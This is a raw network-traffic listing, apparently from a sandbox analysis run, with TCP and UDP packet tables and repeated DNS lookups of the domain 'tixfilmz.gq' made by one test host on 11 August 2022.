Aug 11, 2022 06:43:50.049511909 CEST	80	49881	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:50.116230011 CEST	80	49881	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:50.116265059 CEST	80	49881	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:50.116858006 CEST	49881	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:50.116898060 CEST	49881	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:50.134080887 CEST	80	49881	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:51.642822981 CEST	49882	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:51.659795046 CEST	80	49882	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:51.659908056 CEST	49882	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:51.663594961 CEST	49882	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:51.680474997 CEST	80	49882	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:51.680593014 CEST	49882	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:51.697478056 CEST	80	49882	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:51.756084919 CEST	80	49882	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:51.756194115 CEST	80	49882	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:51.756268978 CEST	49882	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:51.756373882 CEST	49882	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:51.773108006 CEST	80	49882	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:53.287111998 CEST	49883	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:53.305113077 CEST	80	49883	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:53.305223942 CEST	49883	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:53.308239937 CEST	49883	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:53.325719118 CEST	80	49883	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:53.325928926 CEST	49883	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:53.342715025 CEST	80	49883	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:53.422276974 CEST	80	49883	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:53.422316074 CEST	80	49883	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:53.422451019 CEST	49883	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:53.422569990 CEST	49883	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:43:53.441950083 CEST	80	49883	188.114.97.3	192.168.2.3
Aug 11, 2022 06:43:54.310568094 CEST	49884	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:54.327620983 CEST	80	49884	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:54.327752113 CEST	49884	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:54.330408096 CEST	49884	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:54.347140074 CEST	80	49884	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:54.347251892 CEST	49884	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:54.364037037 CEST	80	49884	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:54.443857908 CEST	80	49884	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:54.444036007 CEST	80	49884	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:54.444139957 CEST	49884	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:54.444660902 CEST	49884	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:54.461000919 CEST	80	49884	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:55.355025053 CEST	49885	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:55.371938944 CEST	80	49885	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:55.373763084 CEST	49885	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:55.376396894 CEST	49885	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:55.393197060 CEST	80	49885	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:55.394433975 CEST	49885	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:55.411267996 CEST	80	49885	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:55.477446079 CEST	80	49885	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:55.477741003 CEST	49885	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:55.494657040 CEST	80	49885	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:55.701412916 CEST	80	49885	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:55.701716900 CEST	49885	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:58.311187029 CEST	49887	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:58.328255892 CEST	80	49887	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:58.328859091 CEST	49887	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:58.405291080 CEST	49887	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:58.422405958 CEST	80	49887	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:58.422477961 CEST	49887	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:58.439588070 CEST	80	49887	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:58.521328926 CEST	80	49887	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:58.521368980 CEST	80	49887	188.114.96.3	192.168.2.3
Aug 11, 2022 06:43:58.521471977 CEST	49887	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:58.524753094 CEST	49887	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:43:58.541793108 CEST	80	49887	188.114.96.3	192.168.2.3
Aug 11, 2022 06:44:00.111968994 CEST	49888	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:44:00.129822969 CEST	80	49888	188.114.96.3	192.168.2.3
Aug 11, 2022 06:44:00.130165100 CEST	49888	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:44:00.133245945 CEST	49888	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:44:00.150147915 CEST	80	49888	188.114.96.3	192.168.2.3
Aug 11, 2022 06:44:00.150311947 CEST	49888	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:44:00.167206049 CEST	80	49888	188.114.96.3	192.168.2.3
Aug 11, 2022 06:44:00.224335909 CEST	80	49888	188.114.96.3	192.168.2.3
Aug 11, 2022 06:44:00.224378109 CEST	80	49888	188.114.96.3	192.168.2.3
Aug 11, 2022 06:44:00.224474907 CEST	49888	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:44:00.224551916 CEST	49888	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:44:00.241606951 CEST	80	49888	188.114.96.3	192.168.2.3
Aug 11, 2022 06:44:01.738924026 CEST	49889	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:01.756063938 CEST	80	49889	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:01.756354094 CEST	49889	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:01.764744997 CEST	49889	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:01.781652927 CEST	80	49889	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:01.781905890 CEST	49889	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:01.798881054 CEST	80	49889	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:01.874361038 CEST	80	49889	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:01.874432087 CEST	80	49889	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:01.874636889 CEST	49889	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:01.874681950 CEST	49889	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:01.891566992 CEST	80	49889	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:03.437485933 CEST	49890	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:03.454427958 CEST	80	49890	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:03.454562902 CEST	49890	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:03.457386971 CEST	49890	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:03.474327087 CEST	80	49890	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:03.474813938 CEST	49890	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:03.491703987 CEST	80	49890	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:03.564661026 CEST	80	49890	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:03.564749956 CEST	80	49890	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:03.564944983 CEST	49890	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:03.565779924 CEST	49890	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:03.582649946 CEST	80	49890	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:04.896159887 CEST	49892	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:04.913132906 CEST	80	49892	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:04.913218975 CEST	49892	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:04.916627884 CEST	49892	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:04.933406115 CEST	80	49892	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:04.933479071 CEST	49892	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:04.950350046 CEST	80	49892	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:05.023818016 CEST	80	49892	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:05.023859978 CEST	80	49892	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:05.024019003 CEST	49892	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:05.024565935 CEST	49892	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:05.040952921 CEST	80	49892	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:06.136435986 CEST	49895	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:06.153575897 CEST	80	49895	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:06.153800964 CEST	49895	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:06.157277107 CEST	49895	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:06.174215078 CEST	80	49895	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:06.174385071 CEST	49895	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:06.191430092 CEST	80	49895	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:06.249001026 CEST	80	49895	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:06.249046087 CEST	80	49895	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:06.249176025 CEST	49895	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:06.249213934 CEST	49895	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:06.266207933 CEST	80	49895	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:07.764620066 CEST	49896	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:07.781574965 CEST	80	49896	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:07.781837940 CEST	49896	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:07.789189100 CEST	49896	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:07.806022882 CEST	80	49896	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:07.806155920 CEST	49896	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:07.823090076 CEST	80	49896	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:07.921392918 CEST	80	49896	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:07.921555042 CEST	80	49896	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:07.921561003 CEST	49896	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:07.921627998 CEST	49896	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:07.938440084 CEST	80	49896	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:08.807578087 CEST	49897	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:44:08.824702978 CEST	80	49897	188.114.96.3	192.168.2.3
Aug 11, 2022 06:44:08.824954033 CEST	49897	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:44:08.828123093 CEST	49897	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:44:08.845180035 CEST	80	49897	188.114.96.3	192.168.2.3
Aug 11, 2022 06:44:08.845298052 CEST	49897	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:44:08.862283945 CEST	80	49897	188.114.96.3	192.168.2.3
Aug 11, 2022 06:44:08.957175970 CEST	80	49897	188.114.96.3	192.168.2.3
Aug 11, 2022 06:44:08.957284927 CEST	80	49897	188.114.96.3	192.168.2.3
Aug 11, 2022 06:44:08.957410097 CEST	49897	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:44:08.957448006 CEST	49897	80	192.168.2.3	188.114.96.3
Aug 11, 2022 06:44:08.974426985 CEST	80	49897	188.114.96.3	192.168.2.3
Aug 11, 2022 06:44:09.883063078 CEST	49898	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:09.900207043 CEST	80	49898	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:09.900368929 CEST	49898	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:09.907279015 CEST	49898	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:09.924297094 CEST	80	49898	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:09.924417973 CEST	49898	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:09.941373110 CEST	80	49898	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:10.024667978 CEST	80	49898	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:10.024714947 CEST	80	49898	188.114.97.3	192.168.2.3
Aug 11, 2022 06:44:10.024833918 CEST	49898	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:10.024887085 CEST	49898	80	192.168.2.3	188.114.97.3
Aug 11, 2022 06:44:10.041824102 CEST	80	49898	188.114.97.3	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 11, 2022 06:42:12.579299927 CEST	56417	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:12.602015018 CEST	53	56417	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:13.992285013 CEST	55923	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:14.014944077 CEST	53	55923	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:15.008493900 CEST	57723	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:15.031099081 CEST	53	57723	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:16.117017984 CEST	58116	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:16.137682915 CEST	53	58116	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:17.405890942 CEST	57421	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:17.425028086 CEST	53	57421	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:18.496882915 CEST	65358	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:18.516221046 CEST	53	65358	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:19.546256065 CEST	49873	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:19.568968058 CEST	53	49873	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:20.700263977 CEST	53802	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:20.720654964 CEST	53	53802	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:21.791645050 CEST	65266	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:21.811207056 CEST	53	65266	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:22.919214964 CEST	63332	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:22.941586018 CEST	53	63332	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:23.995779991 CEST	63548	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:24.015325069 CEST	53	63548	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:25.168421984 CEST	49327	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:25.185749054 CEST	53	49327	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:26.266694069 CEST	51391	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:26.285726070 CEST	53	51391	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:27.336091995 CEST	58981	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:27.355494976 CEST	53	58981	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:28.398569107 CEST	64452	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:28.415982008 CEST	53	64452	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:29.567910910 CEST	61380	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:29.587415934 CEST	53	61380	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:30.599355936 CEST	63146	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:30.618824005 CEST	53	63146	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:31.643933058 CEST	52985	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:31.661487103 CEST	53	52985	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:32.866031885 CEST	58625	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:32.883007050 CEST	53	58625	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:33.939414978 CEST	52810	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:33.958312035 CEST	53	52810	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:35.888000011 CEST	50778	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:35.905409098 CEST	53	50778	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:39.275734901 CEST	55151	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:39.295176029 CEST	53	55151	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:41.147021055 CEST	59795	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:41.166609049 CEST	53	59795	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:42.621895075 CEST	64816	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:42.748029947 CEST	53	64816	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:44.058989048 CEST	53816	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:44.078478098 CEST	53	53816	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:45.236285925 CEST	60640	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:45.256028891 CEST	53	60640	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:46.902745962 CEST	49844	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:46.922283888 CEST	53	49844	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:49.092282057 CEST	63861	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:49.111659050 CEST	53	63861	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:50.516971111 CEST	51518	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:50.536231041 CEST	53	51518	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:51.834033012 CEST	52581	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:51.851875067 CEST	53	52581	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:53.157044888 CEST	50152	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:53.176513910 CEST	53	50152	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:54.271861076 CEST	50450	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:54.291218042 CEST	53	50450	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:55.372447968 CEST	52427	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:55.389997959 CEST	53	52427	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:56.596381903 CEST	62724	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:56.616301060 CEST	53	62724	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:58.058382034 CEST	64941	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:58.078123093 CEST	53	64941	8.8.8.8	192.168.2.3
Aug 11, 2022 06:42:59.355876923 CEST	55403	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:42:59.373456955 CEST	53	55403	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:00.603039026 CEST	54960	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:00.622443914 CEST	53	54960	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:01.898330927 CEST	61877	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:01.917530060 CEST	53	61877	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:02.955979109 CEST	64624	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:02.975430965 CEST	53	64624	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:04.122617960 CEST	64412	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:04.141944885 CEST	53	64412	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:05.296510935 CEST	51779	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:05.314194918 CEST	53	51779	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:06.496205091 CEST	50608	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:06.515471935 CEST	53	50608	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:07.973258018 CEST	54205	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:07.990590096 CEST	53	54205	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:09.210062981 CEST	58497	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:09.229652882 CEST	53	58497	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:10.585853100 CEST	62701	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:10.605609894 CEST	53	62701	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:11.857250929 CEST	58561	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:11.876543999 CEST	53	58561	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:13.118525028 CEST	61555	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:13.137489080 CEST	53	61555	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:14.460020065 CEST	64433	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:14.482197046 CEST	53	64433	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:16.765618086 CEST	54096	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:16.782715082 CEST	53	54096	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:19.702389002 CEST	63326	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:19.721796036 CEST	53	63326	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:24.353002071 CEST	51557	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:24.372870922 CEST	53	51557	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:28.465460062 CEST	52487	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:28.482649088 CEST	53	52487	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:31.883057117 CEST	58950	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:31.902369022 CEST	53	58950	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:33.838053942 CEST	55686	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:33.857176065 CEST	53	55686	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:38.314882994 CEST	64934	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:38.334461927 CEST	53	64934	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:40.517680883 CEST	55795	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:40.536607981 CEST	53	55795	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:42.718416929 CEST	64635	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:42.738006115 CEST	53	64635	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:45.776087999 CEST	55269	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:45.793565989 CEST	53	55269	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:47.294298887 CEST	63083	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:47.313312054 CEST	53	63083	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:48.364883900 CEST	54726	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:48.382242918 CEST	53	54726	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:49.974272013 CEST	58394	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:49.993833065 CEST	53	58394	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:51.595494986 CEST	49775	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:51.615442038 CEST	53	49775	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:53.263878107 CEST	60195	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:53.284096956 CEST	53	60195	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:54.290009975 CEST	55197	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:54.309494972 CEST	53	55197	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:55.334676981 CEST	52252	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:55.353864908 CEST	53	52252	8.8.8.8	192.168.2.3
Aug 11, 2022 06:43:58.292326927 CEST	60697	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:43:58.309959888 CEST	53	60697	8.8.8.8	192.168.2.3
Aug 11, 2022 06:44:00.089895010 CEST	51966	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:44:00.108901978 CEST	53	51966	8.8.8.8	192.168.2.3
Aug 11, 2022 06:44:01.716732025 CEST	54306	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:44:01.736135960 CEST	53	54306	8.8.8.8	192.168.2.3
Aug 11, 2022 06:44:03.415052891 CEST	50062	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:44:03.434765100 CEST	53	50062	8.8.8.8	192.168.2.3
Aug 11, 2022 06:44:04.875478029 CEST	50869	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:44:04.894697905 CEST	53	50869	8.8.8.8	192.168.2.3
Aug 11, 2022 06:44:06.112749100 CEST	61481	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:44:06.132136106 CEST	53	61481	8.8.8.8	192.168.2.3
Aug 11, 2022 06:44:07.745066881 CEST	50386	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:44:07.762610912 CEST	53	50386	8.8.8.8	192.168.2.3
Aug 11, 2022 06:44:08.781137943 CEST	52857	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:44:08.800934076 CEST	53	52857	8.8.8.8	192.168.2.3
Aug 11, 2022 06:44:09.862853050 CEST	52983	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:44:09.882337093 CEST	53	52983	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 11, 2022 06:42:12.579299927 CEST	192.168.2.3	8.8.8.8	0x5c29	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:13.992285013 CEST	192.168.2.3	8.8.8.8	0xbd3d	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:15.008493900 CEST	192.168.2.3	8.8.8.8	0x9c66	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:16.117017984 CEST	192.168.2.3	8.8.8.8	0xb56c	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:17.405890942 CEST	192.168.2.3	8.8.8.8	0x673c	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:18.496882915 CEST	192.168.2.3	8.8.8.8	0xe48e	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:19.546256065 CEST	192.168.2.3	8.8.8.8	0x48ed	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:20.700263977 CEST	192.168.2.3	8.8.8.8	0x281b	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:21.791645050 CEST	192.168.2.3	8.8.8.8	0x5b0e	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:22.919214964 CEST	192.168.2.3	8.8.8.8	0x8ef0	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:23.995779991 CEST	192.168.2.3	8.8.8.8	0xe554	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
Aug 11, 2022 06:42:25.168421984 CEST	192.168.2.3	8.8.8.8	0x3ae7	Standard query (0)	tixfilmz.gq	A (IP address)	IN (0x0001)
